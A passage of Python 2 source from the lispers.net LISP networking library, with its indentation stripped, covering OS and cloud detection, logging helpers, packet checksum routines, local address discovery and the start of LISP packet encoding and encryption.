# Return True if this system is running Fedora Linux.
#
def lisp_is_fedora():
return(platform.dist()[0] == "fedora")
#enddef
#
# lisp_is_centos
#
# Return True if this system is running CentOS Linux.
#
def lisp_is_centos():
return(platform.dist()[0] == "centos")
#enddef
#
# lisp_is_debian
#
# Return True if this system is running Debian Jessie.
#
def lisp_is_debian():
return(platform.dist()[0] == "debian")
#enddef
#
# lisp_is_debian
#
# Return True if this system is running Debian Jessie.
#
def lisp_is_debian_kali():
return(platform.dist()[0] == "Kali")
#enddef
#
# lisp_is_macos
#
# Return True if this system is running MacOS operating system.
#
def lisp_is_macos():
return(platform.uname()[0] == "Darwin")
#enddef
#
# lisp_is_alpine
#
# Return True if this system is running the Apline Linux operating system.
#
def lisp_is_alpine():
return(os.path.exists("/etc/alpine-release"))
#enddef
#
# lisp_is_x86
#
# Return True if this process is an x86 little-endian machine.
#
def lisp_is_x86():
cpu = platform.machine()
return(cpu in ("x86", "i686", "x86_64"))
#enddef
#
# lisp_is_linux
#
# Return True if this is a ubuntu or fedora system.
#
def lisp_is_linux():
return(platform.uname()[0] == "Linux")
#enddef
#
# lisp_on_aws
#
# Return True if this node is running in an Amazon VM on AWS.
#
def lisp_on_aws():
vm = commands.getoutput("sudo dmidecode -s bios-vendor")
if (vm.find("command not found") != -1 and lisp_on_docker()):
aws = bold("AWS check", False)
lprint("{} - dmidecode not installed in docker container".format(aws))
#endif
return(vm.lower().find("amazon") != -1)
#enddef
#
# lisp_on_gcp
#
# Return True if this node is running in an Google Compute Engine VM.
#
def lisp_on_gcp():
vm = commands.getoutput("sudo dmidecode -s bios-version")
return(vm.lower().find("google") != -1)
#enddef
#
# lisp_on_docker
#
# Are we in a docker container?
#
def lisp_on_docker():
return(os.path.exists("/.dockerenv"))
#enddef
#
# lisp_process_logfile
#
# Check to see if logfile exists. If not, it is startup time to create one
# or another procedure rotated the file out of the directory.
#
def lisp_process_logfile():
logfile = "./logs/lisp-{}.log".format(lisp_log_id)
if (os.path.exists(logfile)): return
sys.stdout.close()
sys.stdout = open(logfile, "a")
lisp_print_banner(bold("logfile rotation", False))
return
#enddef
#
# lisp_i_am
#
# The individual components tell the libraries who they are so we can prefix
# the component name for print() and logs().
#
def lisp_i_am(name):
global lisp_log_id, lisp_i_am_itr, lisp_i_am_etr, lisp_i_am_rtr
global lisp_i_am_mr, lisp_i_am_ms, lisp_i_am_ddt, lisp_i_am_core
global lisp_hostname
lisp_log_id = name
if (name == "itr"): lisp_i_am_itr = True
if (name == "etr"): lisp_i_am_etr = True
if (name == "rtr"): lisp_i_am_rtr = True
if (name == "mr"): lisp_i_am_mr = True
if (name == "ms"): lisp_i_am_ms = True
if (name == "ddt"): lisp_i_am_ddt = True
if (name == "core"): lisp_i_am_core = True
#
# Set hostname to normalize dino-macbook.local or dino-macbook.wp.comcast.
# net to "dino-macbook".
#
lisp_hostname = socket.gethostname()
index = lisp_hostname.find(".")
if (index != -1): lisp_hostname = lisp_hostname[0:index]
return
#enddef
#
# lprint
#
# Print with timestamp and component name prefixed. If "force" is any argument,
# then we don't care about the lisp_debug_logging setting and a log message
# is issued.
#
def lprint(*args):
force = ("force" in args)
if (lisp_debug_logging == False and force == False): return
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print "{}: {}:".format(ts, lisp_log_id),
for arg in args:
if (arg == "force"): continue
print arg,
#endfor
print ""
try: sys.stdout.flush()
except: pass
return
#enddef
#
# fprint
#
# Do a lprint() when debug logging is off but "force" flag is supplied and
# can print messages..
#
def fprint(*args):
nargs = args + ("force",)
lprint(*nargs)
return
#enddef
#
# dprint
#
# Data-plane logging. Call lprint() only if lisp.lisp_data_plane_logging is
# True.
#
def dprint(*args):
if (lisp_data_plane_logging): lprint(*args)
return
#enddef
#
# debug
#
# Used for debugging. Used to find location of temporary "printf" code so it
# can be removed for production code.
#
def debug(*args):
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print red(">>>", False),
print "{}:".format(ts),
for arg in args: print arg,
print red("<<<\n", False)
try: sys.stdout.flush()
except: pass
return
#enddef
#
# lisp_print_caller
#
# Print out calling stack.
#
def lisp_print_caller():
fprint(traceback.print_last())
#enddef
#
# lisp_print_banner
#
# Print out startup and shutdown banner.
#
def lisp_print_banner(string):
global lisp_version, lisp_hostname
if (lisp_version == ""):
lisp_version = commands.getoutput("cat lisp-version.txt")
#endif
hn = bold(lisp_hostname, False)
lprint("lispers.net LISP {} {}, version {}, hostname {}".format(string,
datetime.datetime.now(), lisp_version, hn))
return
#enddef
#
# green
#
# For printing banner.
#
def green(string, html):
if (html): return('<font color="green"><b>{}</b></font>'.format(string))
return(bold("\033[92m" + string + "\033[0m", html))
#enddef
#
# green_last_sec
#
# For printing packets in the last 1 second.
#
def green_last_sec(string):
return(green(string, True))
#enddef
#
# green_last_minute
#
# For printing packets in the last 1 minute.
#
def green_last_min(string):
return('<font color="#58D68D"><b>{}</b></font>'.format(string))
#enddef
#
# red
#
# For printing banner.
#
def red(string, html):
if (html): return('<font color="red"><b>{}</b></font>'.format(string))
return(bold("\033[91m" + string + "\033[0m", html))
#enddef
#
# blue
#
# For printing distinguished-name AFIs.
#
def blue(string, html):
if (html): return('<font color="blue"><b>{}</b></font>'.format(string))
return(bold("\033[94m" + string + "\033[0m", html))
#enddef
#
# bold
#
# For printing banner.
#
def bold(string, html):
if (html): return("<b>{}</b>".format(string))
return("\033[1m" + string + "\033[0m")
#enddef
#
# convert_font
#
# Converts from text baesd bold/color to HTML bold/color.
#
def convert_font(string):
escapes = [ ["[91m", red], ["[92m", green], ["[94m", blue], ["[1m", bold] ]
right = "[0m"
for e in escapes:
left = e[0]
color = e[1]
offset = len(left)
index = string.find(left)
if (index != -1): break
#endfor
while (index != -1):
end = string[index::].find(right)
bold_string = string[index+offset:index+end]
string = string[:index] + color(bold_string, True) + \
string[index+end+offset::]
index = string.find(left)
#endwhile
#
# Call this function one more time if a color was in bold.
#
if (string.find("[1m") != -1): string = convert_font(string)
return(string)
#enddef
#
# lisp_space
#
# Put whitespace in URL encoded string.
#
def lisp_space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_button
#
# Return string of a LISP html button.
#
def lisp_button(string, url):
b = '<button style="background-color:transparent;border-radius:10px; ' + \
'type="button">'
if (url == None):
html = b + string + "</button>"
else:
a = '<a href="{}">'.format(url)
s = lisp_space(2)
html = s + a + b + string + "</button></a>" + s
#endif
return(html)
#enddef
#
# lisp_print_cour
#
# Print in HTML Courier-New font.
#
def lisp_print_cour(string):
output = '<font face="Courier New">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_print_sans
#
# Print in HTML Sans-Serif font.
#
def lisp_print_sans(string):
output = '<font face="Sans-Serif">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_span
#
# Print out string when a pointer hovers over some text.
#
def lisp_span(string, hover_string):
output = '<span title="{}">{}</span>'.format(hover_string, string)
return(output)
#enddef
#
# lisp_eid_help_hover
#
# Create hover title for any input EID form.
#
def lisp_eid_help_hover(output):
eid_help_str = \
'''Unicast EID format:
For longest match lookups:
<address> or [<iid>]<address>
For exact match lookups:
<prefix> or [<iid>]<prefix>
Multicast EID format:
For longest match lookups:
<address>-><group> or
[<iid>]<address>->[<iid>]<group>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# lisp_geo_help_hover
#
# Create hover title for any input Geo or EID form.
#
def lisp_geo_help_hover(output):
eid_help_str = \
'''EID format:
<address> or [<iid>]<address>
'<name>' or [<iid>]'<name>'
Geo-Point format:
d-m-s-<N|S>-d-m-s-<W|E> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>
Geo-Prefix format:
d-m-s-<N|S>-d-m-s-<W|E>/<km> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>/<km>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# space
#
# Put whitespace in URL encoded string.
#
def space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_get_ephemeral_port
#
# Select random UDP port for use of a source port in a Map-Request and
# destination port in a Map-Reply.
#
def lisp_get_ephemeral_port():
return(random.randrange(32768, 65535))
#enddef
#
# lisp_get_data_nonce
#
# Get a 24-bit random nonce to insert in data header.
#
def lisp_get_data_nonce():
return(random.randint(0, 0xffffff))
#enddef
#
# lisp_get_control_nonce
#
# Get a 64-bit random nonce to insert in control packets.
#
def lisp_get_control_nonce():
return(random.randint(0, (2**64)-1))
#enddef
#
# lisp_hex_string
#
# Take an integer, either 16, 32, or 64 bits in width and return a hex string.
# But don't return the leading "0x". And don't return a trailing "L" if the
# integer is a negative 64-bit value (high-order bit set).
#
def lisp_hex_string(integer_value):
value = hex(integer_value)[2::]
if (value[-1] == "L"): value = value[0:-1]
return(value)
#enddef
#
# lisp_get_timestamp
#
# Use time library to get a current timestamp.
#
def lisp_get_timestamp():
return(time.time())
#enddef
#
# lisp_set_timestamp
#
# Use time library to set time into the future.
#
def lisp_set_timestamp(seconds):
return(time.time() + seconds)
#enddef
#
# lisp_print_elapsed
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_elapsed(ts):
if (ts == 0 or ts == None): return("never")
elapsed = time.time() - ts
elapsed = round(elapsed, 0)
return(str(datetime.timedelta(seconds=elapsed)))
#enddef
#
# lisp_print_future
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_future(ts):
if (ts == 0): return("never")
future = ts - time.time()
if (future < 0): return("expired")
future = round(future, 0)
return(str(datetime.timedelta(seconds=future)))
#enddef
#
# lisp_print_eid_tuple
#
# Prints in html or returns a string of the following combinations:
#
# [<iid>]<eid>/<ml>
# <eid>/<ml>
# ([<iid>]<source-eid>/ml, [<iid>]<group>/ml)
#
# This is called by most of the data structure classes as "print_eid_tuple()".
#
def lisp_print_eid_tuple(eid, group):
eid_str = eid.print_prefix()
if (group.is_null()): return(eid_str)
group_str = group.print_prefix()
iid = group.instance_id
if (eid.is_null() or eid.is_exact_match(group)):
index = group_str.find("]") + 1
return("[{}](*, {})".format(iid, group_str[index::]))
#endif
sg_str = eid.print_sg(group)
return(sg_str)
#enddef
#
# lisp_convert_6to4
#
# IPC messages will store an IPv4 address in an IPv6 "::ffff:<ipv4-addr>"
# format since we have a udp46 tunnel open. Convert it an IPv4 address.
#
def lisp_convert_6to4(addr_str):
if (addr_str.find("::ffff:") == -1): return(addr_str)
addr = addr_str.split(":")
return(addr[-1])
#enddef
#
# lisp_convert_4to6
#
# We are sending on a udp46 socket, so if the destination is IPv6
# we have an address format we can use. If destination is IPv4 we
# need to put the address in a IPv6 IPv4-compatible format.
#
# Returns a lisp_address().
#
def lisp_convert_4to6(addr_str):
addr = lisp_address(LISP_AFI_IPV6, "", 128, 0)
if (addr.is_ipv4_string(addr_str)): addr_str = "::ffff:" + addr_str
addr.store_address(addr_str)
return(addr)
#enddef
#
# lisp_gethostbyname
#
# Return an address if string is a name or address. If socket.gethostbyname()
# fails, try socekt.getaddrinfo(). We may be running on Alpine Linux which
# doesn't return DNS names with gethostbyname().
#
def lisp_gethostbyname(string):
ipv4 = string.split(".")
ipv6 = string.split(":")
mac = string.split("-")
if (len(ipv4) == 4):
if (ipv4[0].isdigit() and ipv4[1].isdigit() and ipv4[2].isdigit() and
ipv4[3].isdigit()): return(string)
#endif
if (len(ipv6) > 1):
try:
int(ipv6[0], 16)
return(string)
except:
pass
#endtry
#endif
#
# Make sure there are hex digits between dashes, otherwise could be a
# valid DNS name with dashes.
#
if (len(mac) == 3):
for i in range(3):
try: int(mac[i], 16)
except: break
#endfor
#endif
try:
addr = socket.gethostbyname(string)
return(addr)
except:
if (lisp_is_alpine() == False): return("")
#endtry
#
# Try different approach on Alpine.
#
try:
addr = socket.getaddrinfo(string, 0)[0]
if (addr[3] != string): return("")
addr = addr[4][0]
except:
addr = ""
#endtry
return(addr)
#enddef
#
# lisp_ip_checksum
#
# Input to this function is 20-bytes in packed form. Calculate IP header
# checksum and place in byte 10 and byte 11 of header.
#
def lisp_ip_checksum(data, hdrlen=20):
if (len(data) < hdrlen):
lprint("IPv4 packet too short, length {}".format(len(data)))
return(data)
#endif
ip = binascii.hexlify(data)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, hdrlen*2, 4):
checksum += int(ip[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 10 and 11.
#
checksum = struct.pack("H", checksum)
ip = data[0:10] + checksum + data[12::]
return(ip)
#enddef
#
# lisp_icmp_checksum
#
# Checksum a ICMP Destination Unreachable Too Big message. It will staticly
# checksum 36 bytes.
#
def lisp_icmp_checksum(data):
if (len(data) < 36):
lprint("ICMP packet too short, length {}".format(len(data)))
return(data)
#endif
icmp = binascii.hexlify(data)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, 36, 4):
checksum += int(icmp[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 2 and 4.
#
checksum = struct.pack("H", checksum)
icmp = data[0:2] + checksum + data[4::]
return(icmp)
#enddef
#
# lisp_udp_checksum
#
# Calculate the UDP pseudo header checksum. The variable 'data' is a UDP
# packet buffer starting with the UDP header with the checksum field zeroed.
#
# What is returned is the UDP packet buffer with a non-zero/computed checksum.
#
# The UDP pseudo-header is prepended to the UDP packet buffer which the
# checksum runs over:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Source Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Destination Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Upper-Layer Packet Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | zero | Next Header |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lisp_udp_checksum(source, dest, data):
#
# Build pseudo-header for IPv6.
#
s = lisp_address(LISP_AFI_IPV6, source, LISP_IPV6_HOST_MASK_LEN, 0)
d = lisp_address(LISP_AFI_IPV6, dest, LISP_IPV6_HOST_MASK_LEN, 0)
udplen = socket.htonl(len(data))
next_header = socket.htonl(LISP_UDP_PROTOCOL)
pheader = s.pack_address()
pheader += d.pack_address()
pheader += struct.pack("II", udplen, next_header)
#
# Append UDP packet to pseudo-header. Add zeros to make 4 byte aligned.
#
udp = binascii.hexlify(pheader + data)
add = len(udp) % 4
for i in range(0,add): udp += "0"
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, len(udp), 4):
checksum += int(udp[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at last 2 bytes of UDP header.
#
checksum = struct.pack("H", checksum)
udp = data[0:6] + checksum + data[8::]
return(udp)
#enddef
#
# lisp_igmp_checksum
#
# Comppute IGMP checksum. This is specialzed for an IGMP query 12-byte
# header.
#
def lisp_igmp_checksum(igmp):
g = binascii.hexlify(igmp)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, 24, 4):
checksum += int(g[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 10 and 11.
#
checksum = struct.pack("H", checksum)
igmp = igmp[0:2] + checksum + igmp[4::]
return(igmp)
#enddef
#
# lisp_get_interface_address
#
# Based on supplied interface device, return IPv4 local interface address.
#
def lisp_get_interface_address(device):
#
# Check for illegal device name.
#
if (device not in netifaces.interfaces()): return(None)
#
# Check if there are no IPv4 addresses assigned to interface.
#
addresses = netifaces.ifaddresses(device)
if (addresses.has_key(netifaces.AF_INET) == False): return(None)
#
# Find first private address.
#
return_address = lisp_address(LISP_AFI_IPV4, "", 32, 0)
for addr in addresses[netifaces.AF_INET]:
addr_str = addr["addr"]
return_address.store_address(addr_str)
return(return_address)
#endfor
return(None)
#enddef
#
# lisp_get_input_interface
#
# Based on destination-MAC address of incoming pcap'ed packet, index into
# lisp_mymacs{} to get a interface name string (device name) for all
# interfaces that have the MAC address assigned.
#
# If dest-MAC is not us, look at source MAC to see if we are in a loopback
# situation testing application and xTR in the same system.
#
def lisp_get_input_interface(packet):
macs = lisp_format_packet(packet[0:12]).replace(" ", "")
da = macs[0:12]
sa = macs[12::]
try: my_sa = lisp_mymacs.has_key(sa)
except: my_sa = False
if (lisp_mymacs.has_key(da)): return(lisp_mymacs[da], sa, da, my_sa)
if (my_sa): return(lisp_mymacs[sa], sa, da, my_sa)
return(["?"], sa, da, my_sa)
#enddef
#
# lisp_get_local_interfaces
#
# Go populate the lisp.myinterfaces{} dictionary array. Key is device ID
# returned by the netifaces API.
#
def lisp_get_local_interfaces():
for device in netifaces.interfaces():
interface = lisp_interface(device)
interface.add_interface()
#endfor
return
#enddef
#
# lisp_get_loopback_address
#
# Get first loopback address on device lo which is not 127.0.0.1.
#
def lisp_get_loopback_address():
for addr in netifaces.ifaddresses("lo")[netifaces.AF_INET]:
if (addr["peer"] == "127.0.0.1"): continue
return(addr["peer"])
#endif
return(None)
#enddef
#
# lisp_is_mac_string
#
# Return True if the supplied string parameter is iin form of "xxxx-xxxx-xxxx".
# The input prefix could be "xxxx-xxxx-xxxx/48".
#
def lisp_is_mac_string(mac_str):
mac = mac_str.split("/")
if (len(mac) == 2): mac_str = mac[0]
return(len(mac_str) == 14 and mac_str.count("-") == 2)
#enddef
#
# lisp_get_local_macs
#
# Walk all interfaces, and for each ethernet interface, put the MAC address
# as a key into lisp_mymacs with a value of array of interface names.
#
def lisp_get_local_macs():
for device in netifaces.interfaces():
#
# Ignore bogus interface names that containers may create. Allow
# interfaces ones with colons, dashes and alphanumeric characters.
#
d = device.replace(":", "")
d = device.replace("-", "")
if (d.isalnum() == False): continue
#
# Need this for EOS because a "pimreg" interface will crash the call
# to netifaces.ifaddresses("pimreg").
#
try:
parms = netifaces.ifaddresses(device)
except:
continue
#endtry
if (parms.has_key(netifaces.AF_LINK) == False): continue
mac = parms[netifaces.AF_LINK][0]["addr"]
mac = mac.replace(":", "")
#
# GRE tunnels have strange MAC addresses (less than 48-bits). Ignore
# them.
#
if (len(mac) < 12): continue
if (lisp_mymacs.has_key(mac) == False): lisp_mymacs[mac] = []
lisp_mymacs[mac].append(device)
#endfor
lprint("Local MACs are: {}".format(lisp_mymacs))
return
#enddef
#
# lisp_get_local_rloc
#
# Use "ip addr show" on Linux and "ifconfig" on MacOS to get a local IPv4
# address. Get interface name from "netstat -rn" to grep for.
#
def lisp_get_local_rloc():
out = commands.getoutput("netstat -rn | egrep 'default|0.0.0.0'")
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#
# Get last item on first line of output.
#
out = out.split("\n")[0]
device = out.split()[-1]
addr = ""
macos = lisp_is_macos()
if (macos):
out = commands.getoutput("ifconfig {} | egrep 'inet '".format(device))
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
else:
cmd = 'ip addr show | egrep "inet " | egrep "{}"'.format(device)
out = commands.getoutput(cmd)
if (out == ""):
cmd = 'ip addr show | egrep "inet " | egrep "global lo"'
out = commands.getoutput(cmd)
#endif
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#endif
#
# Check for multi-line. And favor returning private address so NAT
# traversal is used in lig.
#
addr = ""
out = out.split("\n")
for line in out:
a = line.split()[1]
if (macos == False): a = a.split("/")[0]
address = lisp_address(LISP_AFI_IPV4, a, 32, 0)
return(address)
#endif
return(lisp_address(LISP_AFI_IPV4, addr, 32, 0))
#endif
#
# lisp_get_local_addresses
#
# Use netifaces module to get a IPv4 and IPv6 local RLOC of this system.
# Return an array of 2 elements where [0] is an IPv4 RLOC and [1] is an
# IPv6 RLOC.
#
# Stores data in lisp.lisp_myrlocs[].
#
def lisp_get_local_addresses():
global lisp_myrlocs
#
# Check to see if we should not get the first address. Use environment
# variable (1-based addressing) to determine which one to get. If the
# number of addresses are less than the index, use the last one.
#
# The format of the environment variable could be <number> or
# <device>:<number>. The format could also be "<device>:" but make sure
# the user typed in a ":".
#
device_select = None
index = 1
parm = os.getenv("LISP_ADDR_SELECT")
if (parm != None and parm != ""):
parm = parm.split(":")
if (len(parm) == 2):
device_select = parm[0]
index = parm[1]
else:
if (parm[0].isdigit()):
index = parm[0]
else:
device_select = parm[0]
#endif
#endif
index = 1 if (index == "") else int(index)
#endif
rlocs = [None, None, None]
rloc4 = lisp_address(LISP_AFI_IPV4, "", 32, 0)
rloc6 = lisp_address(LISP_AFI_IPV6, "", 128, 0)
device_iid = None
for device in netifaces.interfaces():
if (device_select != None and device_select != device): continue
addresses = netifaces.ifaddresses(device)
if (addresses == {}): continue
#
# Set instance-ID for interface.
#
device_iid = lisp_get_interface_instance_id(device, None)
#
# Look for a non-link-local and non-loopback address.
#
if (addresses.has_key(netifaces.AF_INET)):
ipv4 = addresses[netifaces.AF_INET]
count = 0
for addr in ipv4:
rloc4.store_address(addr["addr"])
if (rloc4.is_ipv4_loopback()): continue
if (rloc4.is_ipv4_link_local()): continue
if (rloc4.address == 0): continue
count += 1
rloc4.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc4, False)): continue
rlocs[0] = rloc4
if (count == index): break
#endfor
#endif
if (addresses.has_key(netifaces.AF_INET6)):
ipv6 = addresses[netifaces.AF_INET6]
count = 0
for addr in ipv6:
addr_str = addr["addr"]
rloc6.store_address(addr_str)
if (rloc6.is_ipv6_string_link_local(addr_str)): continue
if (rloc6.is_ipv6_loopback()): continue
count += 1
rloc6.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc6, False)): continue
rlocs[1] = rloc6
if (count == index): break
#endfor
#endif
#
# Did we find an address? If not, loop and get the next interface.
#
if (rlocs[0] == None): continue
rlocs[2] = device
break
#endfor
addr1 = rlocs[0].print_address_no_iid() if rlocs[0] else "none"
addr2 = rlocs[1].print_address_no_iid() if rlocs[1] else "none"
device = rlocs[2] if rlocs[2] else "none"
device_select = " (user selected)" if device_select != None else ""
addr1 = red(addr1, False)
addr2 = red(addr2, False)
device = bold(device, False)
lprint("Local addresses are IPv4: {}, IPv6: {} from device {}{}, iid {}". \
format(addr1, addr2, device, device_select, device_iid))
lisp_myrlocs = rlocs
return((rlocs[0] != None))
#enddef
#
# lisp_get_all_addresses
#
# Return a list of all local IPv4 and IPv6 addresses from kernel. This is
# going to be used for building pcap and iptables filters. So no loopback or
# link-local addresses are returned.
#
def lisp_get_all_addresses():
address_list = []
for interface in netifaces.interfaces():
try: entry = netifaces.ifaddresses(interface)
except: continue
if (entry.has_key(netifaces.AF_INET)):
for addr in entry[netifaces.AF_INET]:
a = addr["addr"]
if (a.find("127.0.0.1") != -1): continue
address_list.append(a)
#endfor
#endif
if (entry.has_key(netifaces.AF_INET6)):
for addr in entry[netifaces.AF_INET6]:
a = addr["addr"]
if (a == "::1"): continue
if (a[0:5] == "fe80:"): continue
address_list.append(a)
#endfor
#endif
#endfor
return(address_list)
#enddef
#
# lisp_get_all_multicast_rles
#
# Grep lisp.config and get all multicast RLEs that appear in the configuration.
# Returns either an empty array or filled with one or more multicast addresses.
#
def lisp_get_all_multicast_rles():
rles = []
out = commands.getoutput('egrep "rle-address =" ./lisp.config')
if (out == ""): return(rles)
lines = out.split("\n")
for line in lines:
if (line[0] == "#"): continue
rle = line.split("rle-address = ")[1]
rle_byte = int(rle.split(".")[0])
if (rle_byte >= 224 and rle_byte < 240): rles.append(rle)
#endfor
return(rles)
#enddef
#------------------------------------------------------------------------------
#
# LISP packet contents. This keeps state for a LISP encapsulated packet that
# is processed by an RTR and ETR.
#
class lisp_packet():
def __init__(self, packet):
self.outer_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_tos = 0
self.outer_ttl = 0
self.udp_sport = 0
self.udp_dport = 0
self.udp_length = 0
self.udp_checksum = 0
self.inner_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_sport = 0
self.inner_dport = 0
self.lisp_header = lisp_data_header()
self.packet = packet
self.inner_version = 0
self.outer_version = 0
self.encap_port = LISP_DATA_PORT
self.inner_is_fragment = False
self.packet_error = ""
self.gleaned_dest = False
#enddef
def encode(self, nonce):
#
# We could be running with no RLOCs found. If lisp_myrlocs[] is None,
# then self.outer_source will be LISP_AFI_NONE.
#
if (self.outer_source.is_null()): return(None)
#
# We have to build the LISP header here because if we are doing
# lisp-crypto, the ICV covers the LISP header. The function
# lisp_packet.encrypt() will put in the key-id.
#
if (nonce == None):
self.lisp_header.nonce(lisp_get_data_nonce())
elif (self.lisp_header.is_request_nonce(nonce)):
self.lisp_header.request_nonce(nonce)
else:
self.lisp_header.nonce(nonce)
#endif
self.lisp_header.instance_id(self.inner_dest.instance_id)
#
# Encrypt the packet. If something went wrong, send unencrypted packet
# by telling RLOC with key-id 0. For now, just use key-id 1. We are
# supporting just a single key.
#
self.lisp_header.key_id(0)
control = (self.lisp_header.get_instance_id() == 0xffffff)
if (lisp_data_plane_security and control == False):
addr_str = self.outer_dest.print_address_no_iid() + ":" + \
str(self.encap_port)
if (lisp_crypto_keys_by_rloc_encap.has_key(addr_str)):
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]):
keys[1].use_count += 1
packet, encrypted = self.encrypt(keys[1], addr_str)
if (encrypted): self.packet = packet
#endif
#endif
#endif
#
# Start with UDP header. Call hash_packet() to set source-port value.
# Unless we are doing lisp-crypto and nat-traversal.
#
self.udp_checksum = 0
if (self.encap_port == LISP_DATA_PORT):
if (lisp_crypto_ephem_port == None):
if (self.gleaned_dest):
self.udp_sport = LISP_DATA_PORT
else:
self.hash_packet()
#endif
else:
self.udp_sport = lisp_crypto_ephem_port
#endif
else:
self.udp_sport = LISP_DATA_PORT
#endif
self.udp_dport = self.encap_port
self.udp_length = len(self.packet) + 16
#
# IPv6 raw sockets need to have the UDP ports not swapped.
#
if (self.outer_version == 4):
sport = socket.htons(self.udp_sport)
dport = socket.htons(self.udp_dport)
else:
sport = self.udp_sport
dport = self.udp_dport
#endif
dport = socket.htons(self.udp_dport) if self.outer_version == 4 else \
self.udp_dport
udp = struct.pack("HHHH", sport, dport, socket.htons(self.udp_length),
self.udp_checksum)
#
# Encode the LISP header.
#
lisp = self.lisp_header.encode()
#
# Now prepend all 3 headers, LISP, UDP, outer header. See lisp_packet.
# fix_outer_header() for byte-swap details for the frag-offset field.
#
if (self.outer_version == 4):
tl = socket.htons(self.udp_length + 20)
frag = socket.htons(0x4000)
outer = struct.pack("BBHHHBBH", 0x45, self.outer_tos, tl, 0xdfdf,
frag, self.outer_ttl, 17, 0)
outer += self.outer_source.pack_address()
outer += self.outer_dest.pack_address()
outer = lisp_ip_checksum(outer)
elif (self.outer_version == 6):
outer = ""
# short = 6 << 12
# short |= self.outer_tos << 4
# short = socket.htons(short)
# tl = socket.htons(self.udp_length)
# outer = struct.pack("HHHBB", short, 0, tl, 17, self.outer_ttl)
# outer += self.outer_source.pack_address()
# outer += self.outer_dest.pack_address()
else:
return(None)
#endif
self.packet = outer + udp + lisp + self.packet
return(self)
#enddef
def cipher_pad(self, packet):
length = len(packet)
if ((length % 16) != 0):
pad = ((length/16) + 1) * 16
packet = packet.ljust(pad)
#endif
return(packet)
#enddef
def encrypt(self, key, addr_str):
if (key == None or key.shared_key == None):
return([self.packet, False])
#endif
#
# Pad packet to multiple of 16 bytes and call AES cipher.
#
packet = self.cipher_pad(self.packet)
iv = key.get_iv()
ts = lisp_get_timestamp()
aead = None
if (key.cipher_suite == LISP_CS_25519_CHACHA):
encrypt = chacha.ChaCha(key.encrypt_key, iv).encrypt
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
aesgcm = AES.new(k, AES.MODE_GCM, iv)
encrypt = aesgcm.encrypt
aead = aesgcm.digest
except:
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([self.packet, False])
#endtry
else:
k = binascii.unhexlify(key.encrypt_key)
encrypt = AES.new(k, AES.MODE_CBC, iv).encrypt
#endif
ciphertext = encrypt(packet)
if (ciphertext == None): return([self.packet, False])
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
# GCM requires 16 bytes of an AEAD MAC tag at the end of the
# ciphertext. Needed to interoperate with the Go implemenation of
# AES-GCM. The MAC digest was computed above.
#
if (aead != None): ciphertext += aead()
#
# Compute ICV and append to packet. ICV covers the LISP header, the
# IV, and the cipertext.
#
self.lisp_header.key_id(key.key_id)
